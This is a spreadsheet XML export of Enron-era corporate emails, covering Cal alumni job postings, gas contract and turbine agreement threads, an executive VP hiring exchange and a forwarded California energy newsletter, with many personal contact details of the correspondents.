_x000D_
------------------------_x000D_
8._x000D_
LOCATION: Orinda, California (San Francisco Bay Area)_x000D_
_x000D_
TITLE: MARKET NEUTRAL ANALYST_x000D_
_x000D_
COMPANY: AXA Rosenberg Investment Management_x000D_
_x000D_
DEGREE: Master's degree in Business Administration, Economics, Finance, or_x000D_
related field_x000D_
_x000D_
_x000D_
_x000D_
Leading quantitative investment company is looking for a person to assist_x000D_
in a variety of projects related to supporting the firm's flagship products_x000D_
related to Market Neutral investing.  The qualified candidate will have_x000D_
experience with and understanding of market neutral investing, possess_x000D_
strong verbal and written skills and enjoy working in a collegial team_x000D_
environment. Strong programming skills are required._x000D_
_x000D_
The position will involve:_x000D_
_x000D_
?       explaining aspects of the firm's market neutral strategy to_x000D_
prospects and clients;_x000D_
?       actively participate in creating written responses to questions;_x000D_
?       internal support for the institutional and mutual fund marketing_x000D_
and client service efforts;_x000D_
?       developing commentaries to address market neutral performance in_x000D_
light of current market environment._x000D_
?       developing software to support related market neutral activities_x000D_
including: reporting,_x000D_
portfolio monitoring,  strategy analysis_x000D_
Programming:    Strong programming skills in one or more of: C, C++,_x000D_
Fortran, SQL,_x000D_
         MS Access, VisualBasic, Eiffel_x000D_
_x000D_
Experience:             Some exposure to Investment Management and, in_x000D_
particular, Equity Long/Short Market Neutral strategies.  Knowledge of risk_x000D_
based factor models (e.g. BARRA's E3 model).  Ability to communicate_x000D_
technical, statistical concepts in non-technical language._x000D_
_x000D_
Contact:        Send resume to Carolyn Demler, Recruiting Coordinator, by_x000D_
fax 925.253.0141 or email cdemler@axarosenberg.com.  AXA Rosenberg is an_x000D_
Equal Opportunity Employer._x000D_
_x000D_
------------------------_x000D_
9._x000D_
LOCATION: Burlingame, CA_x000D_
_x000D_
TITLE: Internet Strategists (10), Director of Engineering, PERL Programmers_x000D_
(4+), Business Systems Programmer, Telebusiness Representatives (2+),_x000D_
Product Development, Marketing, Sales Operations Manager_x000D_
_x000D_
COMPANY: NetCurrents_x000D_
_x000D_
DEGREE: varied_x000D_
_x000D_
Dear fellow Cal alums,_x000D_
_x000D_
My name is Greg Haack and I am a 1999 BS Haas graduate. My company is_x000D_
looking to fill many positions. We are currently hiring for:_x000D_
_x000D_
Client Operations:_x000D_
Internet Strategists (10)_x000D_
_x000D_
Technology:_x000D_
Director of Engineering_x000D_
PERL Programmers (4+)_x000D_
Business Systems Programmer_x000D_
_x000D_
Sales/Marketing:_x000D_
Telebusiness Representatives (2+)_x000D_
Product Development_x000D_
Marketing_x000D_
Sales Operations Manager_x000D_
_x000D_
If you are at all interested, please check out our website and drop me a_x000D_
line (please note - the job description may not be on the website, email me_x000D_
for one if interested)._x000D_
_x000D_
Go Bears!_x000D_
_x000D_
Greg A. Haack_x000D_
Manager, Client Operations_x000D_
NetCurrents_x000D_
1350 Old Bayshore Highway, Suite 30_x000D_
Burlingame, CA 94010_x000D_
P: (650) 401-4482_x000D_
F: (650) 401-3201_x000D_
E: ghaack@netcurrents.com_x000D_
_x000D_
------------------------_x000D_
10._x000D_
LOCATION: Redwood City, CA_x000D_
_x000D_
TITLE: Contracts Manager_x000D_
_x000D_
COMPANY: SmartForce, formerly CBT Systems USA Ltd_x000D_
_x000D_
DEGREE: BA/BS degree desired_x000D_
_x000D_
Job responsibilities:_x000D_
Broad responsibilities for reviewing, drafting, and negotiating complex_x000D_
inbound and outbound software and high technology licensing agreements with_x000D_
domestic and international customers, suppliers, and business partners_x000D_
(i.e. NDAs, sales, vendor/purchasing, professional services, consulting,_x000D_
distribution, intellectual property). Identify issues found in_x000D_
transactional agreements relating to antitrust, intellectual property,_x000D_
revenue recognition, applicable laws, liability, indemnities, warranties,_x000D_
and other business risks. Recommend alternative actions as required to_x000D_
conform with corporate policies and strategies. Initiate and develop_x000D_
improvements for training sales personnel, and the efficient closing of_x000D_
transactions with a reduced need for negotiations. Revise and create_x000D_
template documents. Assist in legal research. Position is full time, and_x000D_
offers competitive salary and benefits package._x000D_
Qualifications:_x000D_
Requires 5+ years experience in high technology and software licensing,_x000D_
contracts drafting and negotiations, legal analysis and interpretation of_x000D_
business documents, and legal research. Experience understanding regulatory_x000D_
issues,_x000D_
such as export and governmental regulations relating to high technology_x000D_
companies desired. Superior oral and written communication skills and_x000D_
ability to interface with various departments and all levels of management_x000D_
and staff. Must be detail oriented and organized. Must be able to_x000D_
multi-task, work in a fast paced environment with tight deadlines. Must be_x000D_
able to work independently, take ownership of assignments, and take_x000D_
initiative with minimum supervision. Ability to work as a team member and_x000D_
assist in the overflow work of other department members. Ability to_x000D_
effectively manage time and resources. Ability to think strategically and_x000D_
creatively, and to quickly understand SmartForce's products, services, and_x000D_
organizational structure. Proficiency in MS Word, MS Excel, PowerPoint, and_x000D_
other computer database programs required. Web site and intranet site_x000D_
development experience desired. BA/BS degree desired. Requires 5+ years_x000D_
experience in high technology and software licensing, contracts drafting_x000D_
and negotiations, legal analysis and interpretation of business documents,_x000D_
and legal research._x000D_
_x000D_
Contact: Legal Department, SmartForce, 900 Chesapeake Drive, Redwood City,_x000D_
CA 94063, Email: humanresources@smartforce.com, Fax: (650) 817-5062 or Fax:_x000D_
(650) 817-5902_x000D_
_x000D_
SmartForce, is leading the professional education market into the Internet_x000D_
Age through e-Learning, a fundamentally faster and better way to learn._x000D_
SmartForce helps companies create a competitive advantage through a smarter_x000D_
workforce that thrives in the Internet Age. SmartForce is the world's_x000D_
largest e-Learning company. SmartForce provides integrated enterprise_x000D_
e-Learning solutions. SmartForce e-Learning is available as a fully hosted_x000D_
Internet environment through an Internet rental model. With more than 2,500_x000D_
major corporate customers, SmartForce e-Learning solutions bring the power_x000D_
of the Internet to the critical training business process. The SmartForce_x000D_
e-Learning environment is also used by leading Internet, software and other_x000D_
companies to provide the infrastructure to support their e-Learning_x000D_
initiatives. SmartForce is quoted on the NASDAQ National Market under the_x000D_
symbol "SMTF." The company, which has more than 1,500 employees worldwide,_x000D_
has corporate headquarters in Redwood City, CA. Please see_x000D_
www.smartforce.com for more information._x000D_
_x000D_
------------------------_x000D_
11._x000D_
LOCATION: Southwest_x000D_
_x000D_
TITLE: Corporate Development GroupAll levels_x000D_
_x000D_
COMPANY: Foster McKay Group_x000D_
_x000D_
DEGREE: MBA/years work experience interchangeable_x000D_
_x000D_
Leading High technology company--semiconductors/chips_x000D_
Responsibilities: Our client is a leading high technology company that_x000D_
manufactures semiconductors/chips and they are expanding their corporate_x000D_
development group. The candidate/s will work with the corporate development_x000D_
team in identifying, assessing, developing, initiating and executing_x000D_
alliances and acquisitions for the company._x000D_
Qualifications:_x000D_
?       Strong technology/semiconductor background_x000D_
?       MBA/years work experience interchangeable_x000D_
?       M &amp; A experience (with a technology/semiconductor focus) preferred_x000D_
?       Corporate/Business Development experience in a related industry=20_x000D_
desired_x000D_
_x000D_
Please Contact:_x000D_
_x000D_
Lydia Jeorge_x000D_
Foster McKay Group_x000D_
100 Park Avenue_x000D_
New York, NY 10017_x000D_
(212) 843-0400 ext. 204_x000D_
lydia@fostermckayny.com_x000D_
_x000D_
--------------------------------_x000D_
12._x000D_
LOCATION: NYC_x000D_
_x000D_
TITLE: SVP e-Business Strategy_x000D_
_x000D_
COMPANY: McGraw Hill Companies_x000D_
_x000D_
DEGREE: Varied_x000D_
_x000D_
The McGraw Hill Companies, a leading publisher and supplier of financial an=_x000D_
d_x000D_
business information services, is looking for a strategic visionary to help_x000D_
develop, implement, and build a corporate wide global e-commerce strategy._x000D_
This SVP, e-Business Strategy will work in conjunction with the Senior_x000D_
Operating and Executive Committees including the CEO, Corporate CTO, and th=_x000D_
e_x000D_
Division Presidents in setting the strategy for the e-business initiative._x000D_
_x000D_
We are looking for a polished and seasoned senior executive with extensive_x000D_
e-commerce experience. The SVP, e-Business Strategy must have strong_x000D_
communication and management skills and be capable of building and_x000D_
implementing a new e-business initiative. Consulting and financial services_x000D_
experience preferred._x000D_
_x000D_
Salary - Open_x000D_
Email resume and salary requirements to Matt Tulchin at mtulch@gmcsearch.co=_x000D_
m_x000D_
_x000D_
------------------------_x000D_
13._x000D_
LOCATION: San Mateo, CA_x000D_
_x000D_
TITLE: Channel Marketing Manager and Product Marketing Manager_x000D_
_x000D_
COMPANY: Vividence_x000D_
_x000D_
DEGREE: A bachelor's degree is required. MBA preferred. MBA grads with_x000D_
consulting or marketing backgrounds._x000D_
_x000D_
_x000D_
Vividence, the leading authority in Web Experience Evaluation, is looking_x000D_
for a Channel Marketing Manager (CMM) to spearhead our Partner Strategy._x000D_
Vividence is an outstanding company with a great future ahead of it!_x000D_
Vividence was founded in late 1998 and is backed by venture capitalists_x000D_
Kleiner, Perkins, Caufield &amp; Byers, Sequoia Capital, and Angel Investors,_x000D_
L.P. Our management team includes executives from Amazon.com, Microsoft,_x000D_
Oracle, USWeb/CKS, Softbank Venture Capital, Ziff-Davis, Inc. and_x000D_
AdKnowledge. Vividence is already used by more than 130 companies including_x000D_
Microsoft, Compaq, Excite@Home, Wells Fargo, Nordstrom.com, Lycos and_x000D_
Pfizer. To learn more, check us out at www.Vividence.com._x000D_
_x000D_
I have two open positions in the product marketing group, which are_x000D_
described below._x000D_
Product Marketing Manager: As a Product Marketing Manager, you will direct_x000D_
Vividence's external product/service strategy including product design and_x000D_
definition as well as ongoing product management._x000D_
Responsibilities include: understanding the target customer market and its_x000D_
needs; defining a product to meet customer &amp; market </t>
  </si>
  <si>
    <t>Mon, 1 Oct 2001 04:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Internet</t>
  </si>
  <si>
    <t>Mark, is this what you were working on at one point?  Maybe it should go to Sally Beck, but I'm not sure._x000D_
_x000D_
Rosie_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Henderson, Andrew  _x000D_
Sent:	Monday, October 01, 2001 12:27 AM_x000D_
To:	Lay, Kenneth_x000D_
Subject:	Internet_x000D_
_x000D_
Ken,_x000D_
_x000D_
I don't know if you are the right person for this - but I thought that someone should register Enron in the new domain(s) asap before we lose them._x000D_
_x000D_
Although I am in IT, I am not really in the right area and neither is my direct chain of command (although I think they are just great to work for)_x000D_
_x000D_
http://news.bbc.co.uk/hi/english/sci/tech/newsid_1569000/1569222.stm_x000D_
_x000D_
Sorry to have troubled you, but I KNOW that if I mention it, then you will get it to the right person for consideration._x000D_
_x000D_
Many thanks_x000D_
_x000D_
Andrew Henderson</t>
  </si>
  <si>
    <t>Mon, 22 May 2000 02:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sherlyn.schumack@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'stacey.neuweiler@enron.com', 'daren.farmer@enron.com'})</t>
  </si>
  <si>
    <t>Re: PG&amp;E Texas contract 5098-695 for 2/00</t>
  </si>
  <si>
    <t xml:space="preserve">This issue still has not been resolved, and it is effecting  the PG&amp;E _x000D_
contract 5095-037, HPLC transport contract TA99-027, several deals on the _x000D_
interconnect report, and causing payment issues for Katherine Herrera to _x000D_
PanEnergy Marketing.  I have sent several emails, faxed the daily's and left _x000D_
voice messages, but have not received any updates to this issue.  _x000D_
_x000D_
---------------------- Forwarded by Sherlyn Schumack/HOU/ECT on 05/22/2000 _x000D_
09:27 AM ---------------------------_x000D_
Stacey Neuweiler   03/22/2000 12:43 PM_x000D_
_x000D_
To: Sherlyn Schumack/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: PG&amp;E Texas contract 5098-695 for 2/00  _x000D_
_x000D_
Sherlyn-_x000D_
_x000D_
I am looking into this with Lorraine to figure this out.  We did not nominate _x000D_
this for the days you are referring to, but Lorraine says she flowed this gas _x000D_
even though I cut the volume.  I will let you know when this is resolved.  _x000D_
Thanks._x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 05:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: City of Austin Breakout Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Looks like it is ok to keep the same._x000D_
_x000D_
How's the GE master form agreement coming along?  When do you think we will _x000D_
have a draft?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 02/12/2001 01:39 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Eric Booth @ ENRON_DEVELOPMENT                           02/12/2001 _x000D_
10:56 AM_x000D_
	_x000D_
_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc: Eric Boyt@ENRON, Jeffrey M Keenan@ECT _x000D_
_x000D_
Subject: RE: City of Austin Breakout Agreement  _x000D_
_x000D_
Kay-_x000D_
_x000D_
Lee is correct, I'm the one that marked up the performance section.  Since we _x000D_
were writing a breakout agreement for Austin, I thought I would make it apply _x000D_
to site specific performance as well.  Thought it might be helpful.  However, _x000D_
I was not aware of the agreement that Bruce and Lee had.  If Lee really wants _x000D_
to keep the original guarantee, I can live it._x000D_
_x000D_
Eric_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kay Mann@ENRON_x000D_
02/12/2001 10:50 AM_x000D_
To: Eric Booth/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Eric Boyt/Corp/Enron@Enron _x000D_
_x000D_
Subject: RE: City of Austin Breakout Agreement_x000D_
_x000D_
Hi there,_x000D_
_x000D_
Any comment?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 02/12/2001 10:49 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
lee.johnson@ss.ps.ge.com on 02/12/2001 10:44:39 AM_x000D_
To: kay.mann@enron.com, peterthompson@akllp.com_x000D_
cc: paulpipitone@akllp.com, chriscobb@akllp.com, kent.shoemaker@ae.ge.com, _x000D_
lee.johnson@ss.ps.ge.com _x000D_
_x000D_
Subject: RE: City of Austin Breakout Agreement_x000D_
_x000D_
Kay,_x000D_
_x000D_
The guaranteed performance values in section 10 have been edited, &amp; I'm not_x000D_
sure why._x000D_
_x000D_
I'm not sure who to go to on the Technical side of your team.  Maybe Eric_x000D_
Booth can explain, but months ago Bruce Golden and I discussed whether the_x000D_
guarantee values should be revised for site conditions. The decision was_x000D_
made that a site  specific guarantee was not needed, that it would be_x000D_
acceptable to correct for the difference in elevation (sea level to 435 ft)_x000D_
and exhaust losses (6" to 12" backpressure).  _x000D_
_x000D_
I'd prefer to stay the course.  However, if there is now a compelling reason_x000D_
to change, I'd like to request the guarantee based on the revised basis_x000D_
conditions given in Appendix A and verify these performance values.    (We_x000D_
don't have a record of supplying these numbers.) Our guarantee process_x000D_
usually takes several days to a week, depending on the backlog of requests_x000D_
in house._x000D_
_x000D_
Please let me know asap._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Lee_x000D_
_x000D_
 _x000D_
_x000D_
-----Original Message-----_x000D_
From: Thompson, Peter J. [mailto:peterthompson@akllp.com]_x000D_
Sent: Monday, February 12, 2001 9:04 AM_x000D_
To: Kent. Shoemaker (E-mail); Lee. Johnson (E-mail)_x000D_
Cc: Kay Mann (E-mail); Pipitone, Paul; Cobb, Chris_x000D_
Subject: City of Austin Breakout Agreement_x000D_
_x000D_
_x000D_
    _x000D_
   Pursuant to Kay Mann's instructions, attached please find a_x000D_
clean copy of the most recent version of the City of Austin Agreement_x000D_
(the second document below), as well as a blackline showing changes from_x000D_
the last version circulated on December 14.  The Agreement deletes_x000D_
references to specific performance guarantees for combined cycle plants._x000D_
The Agreement now has the exhibits rolled in. To complete the agreement,_x000D_
we need to include the date of execution, the addresses and contacts for_x000D_
Sections 25.1 and 25.3, and Exhibit H-2.  _x000D_
 &lt;&lt;CRO- City of Austin/GE Facility Agreement Versions 3 to 4.DOC&gt;&gt;  _x000D_
&lt;&lt;Gas Turbine Agreement Draft of 12/13/00.DOC&gt;&gt; _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 11:05:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: VP Candidate Greg Shea</t>
  </si>
  <si>
    <t xml:space="preserve">Stan_x000D_
_x000D_
Please read the attachments.  He has met with several people on the Executi=_x000D_
ve Committee.  I just want to proceed before the meeting next monday._x000D_
_x000D_
Let me know._x000D_
_x000D_
John_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Horton, Stanley =20_x000D_
Sent:=09Monday, April 30, 2001 12:29 PM_x000D_
To:=09Lavorato, John_x000D_
Subject:=09Re: VP Candidate Greg Shea_x000D_
_x000D_
The normal process is to have him interviewed by three members of the Execu=_x000D_
tive Committee who then confirm that he meets our requirements for being an=_x000D_
 Enron VP.  I assume you are asking us to agree to deviate from this proces=_x000D_
s.  I am uncomfortable with that due to the fact that if the process is not=_x000D_
 going to be adhered to anyone can nominate a person for VP based on the st=_x000D_
rength of an individuals resume.  If everyone else agrees to the exception =_x000D_
I won't be the one to hold this up but I don't necessarily agree with the e=_x000D_
xception being granted._x000D_
_x000D_
_x000D_
From:=09John J Lavorato/ENRON@enronXgate@enronXgate on 04/30/2001 11:30 AM_x000D_
Sent by:=09Kimberly Hillis/ENRON@enronXgate_x000D_
To:=09Wade Cline/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Joannie Williamson/Co=_x000D_
rp/Enron@ENRON, Cliff Baxter/ENRON@enronXgate, James A Hughes/ENRON@enronXg=_x000D_
ate, Steven J Kean/NA/Enron@Enron, Mike McConnell/HOU/ECT@ECT, Rebecca McDo=_x000D_
nald/ENRON@enronXgate, Mark Metts/Enron@EnronXGate, Stephanie Harris/ENRON@=_x000D_
enronXgate, Maureen McVicker/NA/Enron@Enron, Loretta Brelsford/ENRON@enronX=_x000D_
gate, Dolores Fisher/Enron@EnronXGate, Sherri Sera/Corp/Enron@ENRON, Jana L=_x000D_
 Paxton/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Connie Blackwood/ENRON@enronXg=_x000D_
ate, Mrudula Gadade/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cliff Baxter/ENRON=_x000D_
@enronXgate, Mark Frevert/ENRON@enronXgate, Nicki Daw/ENRON@enronXgate, Luc=_x000D_
y Marshall/Enron Communications@Enron Communications, Kathy McMahon/NA/Enro=_x000D_
n@Enron, Jeremy Blachman/HOU/EES@EES, Philippe A Bibi/ENRON@enronXgate, Ray=_x000D_
mond Bowen/ENRON@enronXgate, Michael R Brown/LON/ECT@ECT, Harold G Buchanan=_x000D_
/HOU/EES@EES, Rick Buy/ENRON@enronXgate, Richard Causey/Corp/Enron@ENRON, D=_x000D_
avid Cox/Enron Communications@Enron Communications, David W Delainey/HOU/EE=_x000D_
S@EES, James Derrick/ENRON@enronXgate, Steve Elliott/Enron Communications@E=_x000D_
nron Communications, Andrew S Fastow/ENRON@enronXgate, Ben Glisan/HOU/ECT@E=_x000D_
CT, Kevin Hannon/Enron Communications@Enron Communications, Rod Hayslett/EN=_x000D_
RON@enronXgate, Stanley Horton/Corp/Enron@Enron, Louise Kitchen/HOU/ECT@ECT=_x000D_
, Mark Koenig/Corp/Enron@ENRON, Kenneth Lay/Corp/Enron@ENRON, Dan Leff/HOU/=_x000D_
EES@EES, Danny McCarty/ET&amp;S/Enron@Enron, Jeffrey McMahon/ENRON@enronXgate, =_x000D_
Mark S Muller/HOU/EES@EES, Cindy Olson/Corp/Enron@ENRON, Lou L Pai/HOU/EES@=_x000D_
EES, Ken Rice/Enron Communications@Enron Communications, Matthew Scrimshaw/=_x000D_
LON/ECT@ECT, Jeffrey A Shankman/ENRON@enronXgate, Jeffrey Sherrick/ENRON@en=_x000D_
ronXgate, John Sherriff/LON/ECT@ECT, Jeff Skilling/Corp/Enron@ENRON, Marty =_x000D_
Sunde/HOU/EES@EES, Greg Whalley/HOU/ECT@ECT, Thomas E White/HOU/EES@EES, G =_x000D_
G Garcia/ENRON@enronXgate, Susan Skarness/ENRON@enronXgate, Karen K Heathma=_x000D_
n/ENRON@enronXgate, Sharron Westbrook/Corp/Enron@ENRON, Kay Chapman/HOU/EES=_x000D_
@EES, Bridget Maronge/ENRON@enronXgate, Inez Dauterive/HOU/ECT@ECT, Carol A=_x000D_
nn Brown/Enron Communications@Enron Communications, Cindy Stark/Corp/Enron@=_x000D_
ENRON, Rosalee Fleming/Corp/Enron@ENRON, Tori L Wells/HOU/ECT@ECT, Cathy Ph=_x000D_
illips/HOU/ECT@ECT, Sue Ford/ENRON@enronXgate, Karen Owens/HOU/EES@EES, Dor=_x000D_
othy Dalton/Enron Communications@Enron Communications, Mercedes Estrada/Enr=_x000D_
on Communications@Enron Communications, Christina Grow/ENRON@enronXgate, La=_x000D_
uren Urquhart/LON/ECT@ECT, Laura Taylor/ENRON@enronxgate, Judy G Smith/HOU/=_x000D_
EES@EES, Suzanne Danz/Corp/Enron@ENRON, Peggy McCurley/ENRON@enronXgate, Ma=_x000D_
rsha Schiller/ENRON@enronXgate, Tammie Schoppe/HOU/ECT@ECT, Kimberly Hillis=_x000D_
/ENRON@enronXgate, Jennifer Burns/ENRON@enronXgate, Sharon Dick/HOU/EES@EES=_x000D_
, Beverly Aden/HOU/EES@EES, Kathy Dodgen/HOU/EES@EES, Leah Rijo/Enron Commu=_x000D_
nications@Enron Communications, Kathy Campos/ENRON@enronXgate, Julie Armstr=_x000D_
ong/Corp/Enron@ENRON, Kelly Johnson/Corp/Enron@ENRON, Rebecca Carter/Corp/E=_x000D_
nron@ENRON_x000D_
cc:=09=20_x000D_
_x000D_
Subject:=09VP Candidate Greg Shea_x000D_
_x000D_
I would like to pursue an offer to Mr. Shea prior to the next Executive Com=_x000D_
mittee meeting on May 7, 2001.  Please forward your comments or questions b=_x000D_
y Tuesday, May 1, 2001 so that I can extend the offer by Wednesday, May 2, =_x000D_
2001._x000D_
_x000D_
You will find attached the recommendation letter and his resume._x000D_
_x000D_
Regards,_x000D_
_x000D_
John Lavorato_x000D_
_x000D_
 &lt;&lt; File: Greg Shea Resume.doc &gt;&gt; =09 &lt;&lt; File: gregshea.doc &gt;&gt;=20_x000D_
_x000D_
Tammie Schoppe on behalf of John Lavorato._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 15 Aug 2000 01:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'guria@statoilenergy.com', 'aevigil@dow.com', 'jwatkins@columbiaenergygroup.com', 'wssheffield@shellus.com', 'landryc@ggc.com', 'jhamilton@tmh.tmc.edu', 'samandjulie855@cs.com', 'kdestep@columbiaenergygroup.com', 'bartlon@epenergy.com', 'tbowen@enron.com', 'joni.veselack@neg.pge.com', 'estate@infohwy.com', 'briant.baker@bhlp.com', 'ejohnson@nfchouston.com', 'eric.mcmurry@engageenergy.com', 'samiller@columbiaenergy.com', 'lennon@sugar-land.dowell.slb.com', 'kwilliams@columbiaenergygroup.com', 'jwinter@sledcity.com', 'robert.bailey@enron.com', 'robin.manthe@astrapharmaceuticals.com', 'scott_louie@hotmail.com', 'careed@dow.com', 'paul.drexelius@cinergy.com', 'rlthompson@columbiaenergygroup.com', 'cybr@ti.com', 'dfrnka@equiva.com', 'joann_collins@enron.com', 'lgallagher@heritagetexas.com', 'cindy.vachuska@enron.com', 'ventuca@louisville.stortek.com', 'rdempsey@energyusa.com', 'marty.brinkman@dhcmail.com', 'ljessee@ceg.com', 'flyyfsher@aol.com', 'mmoorehead@networkoil.com', 'veselack@gj.net', 'tbrasselle@columbiaenergygroup.com', 'klphillips@shellus.com', 'mccuenk@epenergy.com', 'maluis@equiva.com', 'rjbakke@cox.rr.com', 'ccbenoit2@hotmail.com', 'matthew.fleming@enron.com', 'dswales@houston.geoquest.slb.com', 'mmitche2@enron.com', 'chris_sumrow@kindermorgan.com', 'carolyn_a_shelton@reliantenergy.com', 'tudor@shellus.com', 'mgarred@enron.com', 'jpatrickl@poboxes.com', 'blarnich@aol.com', 'dselbst@utilicorp.com', 'jesse.villarreal@enron.com', 'jbarker@enron.com', 'bvanderh@enron.com', 'morrissettev@epenergy.com', 'victor.lamadrid@enron.com', 'chris.germany@enron.com', 'kamoser@dow.com', 'mckolosseus@dow.com', 'kelletj@texaco.com', 'john.steward@openspirit.com', 'tdempsey@stagestores.com', 'swilliams01@coral-energy.com', 'zibam@theticketcompany.com', 'd.frnka@worldnet.att.net', 'asayegh@enron.com', 'sascherwitz@dow.com', 'frank.miller@swpc.siemens.com', 'smcarthur@welcom.com', 'bkadams@ceg.com', 'cmilleson@equiva.com', 'james.thompson@equistarchem.com', 'lveselack@aol.com', 'jhickman@columbiaenergygroup.com', 'alma.campos@wcom.com', 'davef@micro.ti.com', 'play.vb.mike@juno.com', 'kolinge@enron.com', 'gswawak@equilon.com', 'sstonestreet@columbiaenergygroup.com', 'clmiller@shellus.com', 'cburnette@columbiaenergy.com'})</t>
  </si>
  <si>
    <t>Hi from Bethesda</t>
  </si>
  <si>
    <t>Hi everyone!!_x000D_
_x000D_
I made it and my bags finally showed up... almost had to do a shopping trip._x000D_
_x000D_
My apartment is right across from the office and is very nice. Maryland is_x000D_
beautiful and the weather is great... nice and cool... in the 60/70's! I_x000D_
need my sweaters already.... who would have thought._x000D_
_x000D_
TCO (the pipeline I scheduled) is taking us to the Orioles game Friday._x000D_
_x000D_
Please note my e-mail has changed slightly... I know... I said it wouldn't._x000D_
Gen changed to neg. Neg is for National Energy Group. It was gen for US_x000D_
Generating._x000D_
_x000D_
_x000D_
joni.veselack@neg.pge.com_x000D_
_x000D_
_x000D_
My Phone numbers:_x000D_
301-280-6177 work_x000D_
301-654-0508 home (still need to change my voicemail)_x000D_
_x000D_
My address:_x000D_
The Metropolitan_x000D_
7620 Old Georgetown Road_x000D_
Unit #214_x000D_
Bethesda, MD  20814_x000D_
_x000D_
_x000D_
Looking forward to hearing from y'all and your visits!!!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t>
  </si>
  <si>
    <t>Thu, 11 May 2000 03:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Bonneville Power Administration</t>
  </si>
  <si>
    <t xml:space="preserve">David:_x000D_
Enclosed for your review is a draft amendment letter for the above _x000D_
counterparty.  All of the requested chnages are driven by the fact that BPA _x000D_
is a federal agency.  I look forward to hearing from you._x000D_
Carol_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 03:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: EOL Credit Responses 11/20/00</t>
  </si>
  <si>
    <t>Tana:_x000D_
_x000D_
The following CPs are not authorized to trade power:_x000D_
_x000D_
HS Energy Services, Inc. - restricted by credit_x000D_
_x000D_
Basin Electric Power Cooperative - not a current CP/not FERC approved_x000D_
_x000D_
*************************_x000D_
_x000D_
If you want to get me a contact for Basin Electric, I'll call next week and _x000D_
follow up with them._x000D_
_x000D_
Leslie</t>
  </si>
  <si>
    <t>Tue, 10 Jul 2001 00:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'steven.kean@enron.com', 'susan.mara@enron.com'})</t>
  </si>
  <si>
    <t>FW: where does our energy come from?</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Richard Shapiro/NA/Enron on 07/10/2001 _x000D_
07:52 AM ---------------------------_x000D_
_x000D_
_x000D_
"Foster, Gary" &lt;GFoster@Antigenics.com&gt; on 07/10/2001 07:38:17 AM_x000D_
To: "Mark &amp; Cozy Palmer (E-mail)" &lt;mark.palmer@enron.com&gt;, "Rick and Amy _x000D_
Shapiro (E-mail)" &lt;rshapiro@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: FW: where does our energy come from?_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Curt Pringle [mailto:Curt@curtpringle.com]_x000D_
Sent: Monday, July 09, 2001 6:23 PM_x000D_
Subject: where does our energy come from?_x000D_
_x000D_
_x000D_
Assemblyman Bill Leonard's most recent e-newsletter contained the_x000D_
following information.  I think it is very interesting to consider in_x000D_
light of the present energy situation in California and the comments of_x000D_
our present Governor._x000D_
_x000D_
Regards,_x000D_
Curt_x000D_
_x000D_
---------------------------------------------_x000D_
_x000D_
_x000D_
***Who Really Powers California?***_x000D_
Governor Davis has made no secret that he believes that swashbuckling,_x000D_
cattle rustling, energy barons from Texas are to blame for our energy_x000D_
crisis.  While Texas power companies make for good bad guys in the_x000D_
Governor's transparent Kabuki theater of blame, Leonard Letter readers_x000D_
may_x000D_
be interested to see who really provides power to Californians.  The_x000D_
following list illustrates what percentage of our power supply each_x000D_
group of_x000D_
generators provides. (Editor's note: these percentages have been rounded_x000D_
up_x000D_
resulting in slightly more than 100%)_x000D_
_x000D_
18%- Pacific Gas and Electric (California)_x000D_
15%- Southern California Edison (California)_x000D_
11%- Imported power from the Northwest (including Canada)_x000D_
10%- Los Angeles Department of Water and Power (California)_x000D_
10%- Imported power from the Southwest_x000D_
7%- State and Federal Agencies_x000D_
6%- AES power company_x000D_
5%- Municipal Utilities and Irrigation Districts_x000D_
5%- Reliant power company_x000D_
4%- Duke power company_x000D_
4%- Southern power company_x000D_
4%- Dynegy power company_x000D_
1%- Sacramento Municipal Utility District (California)_x000D_
1%- Calpine power company_x000D_
1%- San Diego Gas and Electric (California)_x000D_
 _x000D_
It should be noted that of this list, only Dynegy and Reliant are from_x000D_
Texas.  These two companies represent a total of 9% of California's_x000D_
energy_x000D_
portfolio.  By comparison, Georgia-based Southern (Mirant), Virginia's_x000D_
AES,_x000D_
and North Carolina's Duke Energy, have a 14% share of our energy_x000D_
portfolio._x000D_
_x000D_
This list does not focus on who is gaming the market.  However, every_x000D_
provider listed benefited from skyrocketing energy prices.  In trying to_x000D_
identify those power producers who used market power to ring up high_x000D_
profits_x000D_
